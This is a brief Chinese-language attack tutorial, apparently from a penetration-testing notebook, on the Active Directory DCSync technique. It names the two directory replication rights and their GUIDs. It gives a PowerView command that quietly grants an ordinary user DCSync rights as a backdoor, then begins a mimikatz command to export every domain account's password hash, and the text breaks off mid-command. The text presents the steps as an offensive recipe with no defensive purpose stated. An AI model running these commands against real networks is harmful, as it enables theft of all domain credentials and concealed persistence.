1、攻击介绍
DCSync是mimikatz的一个功能,能够模拟域控制器并从域控制器导出帐户密码hash,如果我们在域内一台主机上获得了域管理员权限,可以使用如下命令直接导出域内所有用户的hash:默认情况下,只有Domain Controllers和Enterprise Domain Admins权限能够使用DCSync但我们可以对域内普通用户添加如下两条ACL实现普通用户调用DCSync导出域内所有用户的hash
DS-Replication-GetChanges(GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)和DS-Replication-Get-Changes-All(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
2、使用powerview添加权限(在域控上操作)
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=<>,DC=<>" -PrincipalIdentity zhangsan -Rights DCSync -Verbose
3、使用zhangsan的机器读取域控上的账户hash
导出所有hash:mimikatz.exe "privilege::debug" "lsadump